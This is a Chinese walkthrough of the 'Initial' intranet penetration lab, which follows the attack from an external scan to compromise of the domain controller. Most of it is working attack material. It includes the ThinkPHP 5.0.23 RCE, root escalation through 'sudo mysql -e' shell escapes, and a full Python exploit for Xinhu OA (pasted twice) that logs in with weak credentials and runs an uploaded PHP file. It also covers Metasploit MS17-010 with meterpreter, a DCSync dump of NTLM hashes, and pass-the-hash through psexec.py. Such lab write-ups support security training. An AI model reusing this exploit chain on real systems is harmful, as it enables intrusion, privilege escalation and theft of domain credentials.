Initial
靶标介绍:
Initial是一套难度为简单的靶场环境,完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag,各部分位于不同的机器上。
入口:fscan扫描端口
结果:
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 39.98.227.140 is alive
[*] Icmp alive hosts len is: 1
39.98.227.140:22 open
39.98.227.140:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle: http://39.98.227.140 code:200 len:5578 title:Bootstrap Material Admin
[+] http://39.98.227.140 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 13.9123559s
存在thinkphp5.0.23RCE漏洞,直接打并写马
内网扫描结果:
172.22.1.2:88 open
172.22.1.18:3306 open
172.22.1.15:22 open
172.22.1.2:139 open
172.22.1.21:445 open
172.22.1.18:445 open
172.22.1.21:135 open
172.22.1.18:135 open
172.22.1.2:135 open
172.22.1.18:80 open
172.22.1.15:80 open
172.22.1.2:445 open
172.22.1.21:139 open
172.22.1.18:139 open
[+] NetInfo:
[*]172.22.1.18
[->]XIAORANG-OA01
[->]172.22.1.18
[+] NetInfo:
[*]172.22.1.2
[->]DC01
[->]172.22.1.2
[+] NetInfo:
[*]172.22.1.21
[->]XIAORANG-WIN7
[->]172.22.1.21
[*] WebTitle:http://172.22.1.15 code:200 len:5578 title:Bootstrap Material Admin
[*] 172.22.1.21 XIAORANG\XIAORANG-WIN7 Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[+] 172.22.1.21 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] 172.22.1.2 (Windows Server 2016 Datacenter 14393)
[*] 172.22.1.2 [+]DC XIAORANG\DC01 Windows Server 2016 Datacenter 14393
[*] 172.22.1.18 XIAORANG\XIAORANG-OA01 Windows Server 2012 R2 Datacenter 9600
[*] WebTitle:http://172.22.1.18 code:302 len:0 title:None 跳转url: http://172.22.1.18?m=login
[*] WebTitle:http://172.22.1.18?m=login code:200 len:4012 title:信呼协同办公系统
第一台机子需要提权,先查看suid:find / -user root -perm /4000 2>/dev/null
发现有sudo,查看sudo -l
,有mysql no pass root运行
直接mysql提权:sudo mysql -e '\! cmd'
sudo mysql -e '\! find / -name flag'
sudo mysql -e '\! cat /root/flag/flag01.txt'
得到第一部分flag
信呼OA系统弱口令:admin/admin123
然后信呼oa也有rce:
EXP:
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=::',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath)
print(r.text)
print(url_pre + filepath)
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=::',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}
r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath)
print(r.text)
print(url_pre + filepath)
上马后在C:/Users/Administrator/flag/找到第二段flag
172.22.1.21存在ms17010,直接打
search ms17
use 0
set payload windows/x64/meterpreter/bind_tcp_uuid
set rhost 172.22.1.21
exploit -j
上线后kiwi打dcsync
session -1
use kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv
得到
502 krbtgt fb812eea13a18b7fcdb8e6d67ddc205b 514
1106 Marcus e07510a4284b3c97c8e7dee970918c5c 512
1107 Charles f6a9881cd5ae709abb4ac9ab87f24617 512
500 Administrator 10cf89a850fb1cdbe6bb432b859164c8 512
1000 DC01$ c4459ccfe941bc3a1835c72070324266 532480
1104 XIAORANG-OA01$ 7d89a53f96224552d90bcc58cc6c6711 4096
1108 XIAORANG-WIN7$ e41d4ce40648363b3cae0236d902260a 4096
打dc的哈希传递即可拿最后一段flag
proxychains4 psexec.py administrator@172.22.1.2 -hashes :10cf89a850fb1cdbe6bb432b859164c8 -codec gbk